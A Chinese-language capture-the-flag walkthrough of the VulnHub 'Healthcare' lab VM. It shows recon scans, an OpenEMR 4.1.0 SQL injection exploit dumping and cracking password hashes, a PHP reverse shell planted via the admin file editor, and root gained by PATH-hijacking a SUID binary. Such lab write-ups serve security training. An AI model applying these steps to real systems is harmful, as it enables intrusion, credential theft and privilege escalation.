Healthcare
作者: jason huawen
靶机信息
名称:
地址:
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor 192.168.56.100 08:00:27:69:f3:d5 1 60 PCS Systemtechnik GmbH 192.168.56.254 08:00:27:f6:d1:32 1 60 PCS Systemtechnik GmbH 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scanStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 22:01 EDTNmap scan report for inplainsight (192.168.56.254)Host is up (0.000090s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp ProFTPD 1.3.3d80/tcp open http Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))| http-robots.txt: 8 disallowed entries | /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ |_/all_our_e-mail_addresses /admin/ /|_http-title: Coming Soon 2|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)MAC Address: 08:00:27:F6:D1:32 (Oracle VirtualBox virtual NIC)Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.74 secondsNMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ ftp 192.168.56.254Connected to 192.168.56.254.220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.56.254]Name (192.168.56.254:kali): anonymous331 Password required for anonymousPassword: 530 Login incorrect.ftp: Login failedftp> quit221 Goodbye. ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ searchsploit ProFTPD -----------------------------------------------------------------FTP不允许匿名访问
FTP服务为ProFTPD,可能存在mod_copy漏洞
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ curl http://192.168.56.254/robots.txt# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $# exclude help system from robotsUser-agent: *Disallow: /manual/Disallow: /manual-2.2/Disallow: /addon-modules/Disallow: /doc/Disallow: /images/# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...Disallow: /all_our_e-mail_addresses# same idea here...Disallow: /admin/# but allow htdig to index our doc-tree#User-agent: htdig#Disallow:# disallow stress testuser-agent: stress-agentDisallow: /robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误。
──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ nikto -h http://192.168.56.254 - Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.254+ Target Hostname: 192.168.56.254+ Target Port: 80+ Start Time: 2023-04-21 22:08:13 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)+ Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan 6 01:21:38 2018+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ "robots.txt" contains 8 entries which should be manually viewed.+ Uncommon header 'tcn' found, with contents: list+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...+ OSVDB-3233: /icons/README: Apache default file found.+ 9543 requests: 0 error(s) and 13 item(s) reported on remote host+ End Time: 2023-04-21 22:09:10 (GMT-4) (57 seconds)---------------------------------------------------------------------------nikto扫描结果认为存在shellcode漏洞,查询得到漏洞利用代码:
https://www.exploit-db.com/exploits/34900但是该代码并不能正常工作,只能另外寻找突破口。
接下来扫描一下目录:
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php,.js,.html,.txt,.sh ===============================================================Gobuster v3.3by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.56.254[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.3[+] Extensions: js,html,txt,sh,php[+] Timeout: 10s===============================================================2023/04/21 22:56:51 Starting gobuster in directory enumeration mode===============================================================/images (Status: 301) [Size: 344] [--> http://192.168.56.254/images/]/index.html (Status: 200) [Size: 5031]/index (Status: 200) [Size: 5031]/.html (Status: 403) [Size: 1000]/css (Status: 301) [Size: 341] [--> http://192.168.56.254/css/]/js (Status: 301) [Size: 340] [--> http://192.168.56.254/js/]/vendor (Status: 301) [Size: 344] [--> http://192.168.56.254/vendor/]/favicon (Status: 200) [Size: 1406]/robots (Status: 200) [Size: 620]/robots.txt (Status: 200) [Size: 620]/fonts (Status: 301) [Size: 343] [--> http://192.168.56.254/fonts/]/gitweb (Status: 301) [Size: 344] [--> http://192.168.56.254/gitweb/]/.html (Status: 403) [Size: 1000]/phpMyAdmin (Status: 403) [Size: 59]/server-status (Status: 403) [Size: 1000]/server-info (Status: 403) [Size: 1000]/openemr (Status: 301) [Size: 345] [--> http://192.168.56.254/openemr/]扫描出/openemr目录,其他目录没有什么价值。
访问该目录,可知CMS为OpenEMR, 版本为4.1.0,查询是否存在相关漏洞
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ searchsploit openEMR 4.1.0-------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path-------------------------------------------------------------------------------------------- ---------------------------------OpenEMR 4.1.0 - 'u' SQL Injection | php/webapps/49742.pyOpenemr-4.1.0 - SQL Injection | php/webapps/17998.txt-------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results ┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ searchsploit -m php/webapps/49742.py Exploit: OpenEMR 4.1.0 - 'u' SQL Injection URL: https://www.exploit-db.com/exploits/49742 Path: /usr/share/exploitdb/exploits/php/webapps/49742.py Codes: N/A Verified: FalseFile Type: Python script, ASCII text executableCopied to: /home/kali/Vulnhub/Healthcare/49742.py将漏洞利用代码拷贝至工作目录,执行该代码
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ python 49742.py ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / // /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /\____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ //_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike[+] Finding number of users...[+] Found number of users: 2[+] Extracting username and password hash...admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d 利用在线网站解密:
https://md5decrypt.net/en/Sha1/#answer得到admin的密码为ackbar, 另外一个用户密码为medical
登录:
http://192.168.56.254/openemr/在administration栏目中,可以Edit file,看是否可以将shell.php代码增加到其中一个文件,比如:statement.inc.php,而且可以看到完整的路径,将shell.php代码拷贝增加到statement.inc.php后,访问该文件:
http://192.168.56.254/openemr/sites/default/statement.inc.php从而在Kali Linux上得到reverse shell
┌──(kali㉿kali)-[~/Vulnhub/Healthcare]└─$ sudo nc -nlvp 5555 [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 37539Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux 20:50:43 up 1:55, 0 users, load average: 1.00, 1.28, 3.57USER TTY LOGIN@ IDLE JCPU PCPU WHATuid=479(apache) gid=416(apache) groups=416(apache)sh: no job control in this shellsh-4.1$ which pythonwhich python/usr/bin/pythonsh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'python -c 'import pty;pty.spawn("/bin/bash")'bash-4.1$ cd /homecd /homebash-4.1$ ls -alhls -alhtotal 20Kdrwxr-xr-x 5 root root 4.0K Jul 29 2020 .drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ..drwxr-xr-x 27 almirant almirant 4.0K Jul 29 2020 almirantdrwxr-xr-x 31 medical medical 4.0K Nov 5 2011 medicaldrwxr-xr-x 3 root root 4.0K Nov 4 2011 mysqlbash-4.1$ cat user.txtcat user.txtd41d8cd98f00b204e9800998ecf8427e从而得到了user flag
提权
看能否用前面得到的密码切换shell到medical
bash-4.1$ su - medicalsu - medicalPassword: medical[medical@localhost ~]$ ididuid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)我们的猜测是正确的
[medical@localhost backups]$ find / -perm -4000 -type f 2>/dev/null/usr/bin/healthcheck有SUID位
[medical@localhost backups]$ strings /usr/bin/healthcheckstrings /usr/bin/healthcheck/lib/ld-linux.so.2__gmon_start__libc.so.6_IO_stdin_usedsetuidsystemsetgid__libc_start_mainGLIBC_2.0PTRhp[^_]clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h可以看到healthcheck会执行ifconfig,因此可以生成我们的ifconfig命令,从而实现提权
cd /tmp[medical@localhost tmp]$ echo '/bin/bash' > ifconfigecho '/bin/bash' > ifconfig[medical@localhost tmp]$ chmod 777 ifconfigchmod 777 ifconfig[medical@localhost tmp]$ export PATH=/tmp:$PATHexport PATH=/tmp:$PATH[medical@localhost tmp]$ /usr/bin/healthcheck/usr/bin/healthcheckTERM environment variable not set.System Health CheckScanning System[root@localhost tmp]# cd /rootcd /root[root@localhost root]# ls -alhls -alhtotal 920Kdrwxr-x--- 20 root root 4.0K Jul 29 2020 ./drwxr-xr-x 21 root root 4.0K Apr 21 18:54 ../-rw------- 1 root root 426 Jul 29 2020 .bash_history-rw-r--r-- 1 root root 193 Sep 24 2011 .bash_profile-rw-rw-rw- 1 root root 422 Sep 6 2011 .bashrcdrwxr-xr-x 2 root root 4.0K Sep 12 2011 .cache/drwx------ 6 root root 4.0K Sep 12 2011 .config/drwx------ 3 root root 4.0K Jul 19 2011 .dbus/drwxr--r-- 2 root root 4.0K Jul 19 2011 Desktop/-rw------- 1 root root 28 Jul 22 2011 .dmrcdrwx------ 3 root root 4.0K Sep 8 2011 Documents/drwx------ 2 root root 4.0K Sep 6 2011 drakx/drwx------ 4 root root 4.0K Sep 24 2011 .gconf/drwx------ 2 root root 4.0K Sep 24 2011 .gconfd/drwx------ 3 root root 4.0K Sep 12 2011 .gnome2/drwx------ 2 root root 4.0K Sep 12 2011 .gnome2_private/drwx------ 3 root root 4.0K Jul 29 2020 .gnupg/drwx------ 2 root root 4.0K Jul 19 2011 .gvfs/-rwxr-xr-x 1 root root 5.7K Jul 29 2020 healthcheck*-rw-r--r-- 1 root root 182 Jul 29 2020 healthcheck.c-rw------- 1 root root 0 Sep 11 2011 .ICEauthoritydrwx------ 3 root root 4.0K Sep 6 2011 .local/drwx------ 3 root root 4.0K Nov 5 2011 .mc/-rw-r--r-- 1 root root 0 Oct 22 2010 .mdk-menu-migrated-rw-r--r-- 1 root root 0 Jul 21 2011 .menu-updates.stamp-rw------- 1 root root 6 Jul 29 2020 .mysql_history-rw-rw-rw- 1 root root 2.1K Jul 29 2020 root.txt-rw-r--r-- 1 root root 797K Apr 12 2020 sudo.rpmdrwx------ 2 root root 4.0K Nov 5 2011 .synaptic/drwx------ 2 root root 4.0K Sep 11 2011 .thumbnails/drwx------ 2 root root 4.0K Apr 21 18:54 tmp/drwxr-xr-x 2 root root 4.0K Jul 29 2020 .xauth/-rw-r--r-- 1 root root 1.9K Jul 6 2011 .xbindkeysrc[root@localhost root]# cat root.txtcat root.txt██ ██ ██████ ██ ██ ████████ ██████ ██ ███████ ██████ ██ ██ █████ ██████ ██████ ███████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██████ ██ █████ ██ ██ ███████ ███████ ██████ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ██████ ██ ██ ██ ██ ███████ ██████ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ██ Thanks for Playing!Follow me at: http://v1n1v131r4.comroot hash: eaff25eaa9ffc8b62e3dfebf70e83a7b [root@localhost root]# 至此成功得到了root shell和root flag.
经验教训
- 在nikto结果得知目标可能存在shellshock后,就认定可以利用漏洞,而忽略对于web应用的正常步骤,即扫描目录,而且需要足够的耐心才能得到相应的目录,否则该靶机将无解。
STRIVE FOR PROGRESS,NOT FOR PERFECTION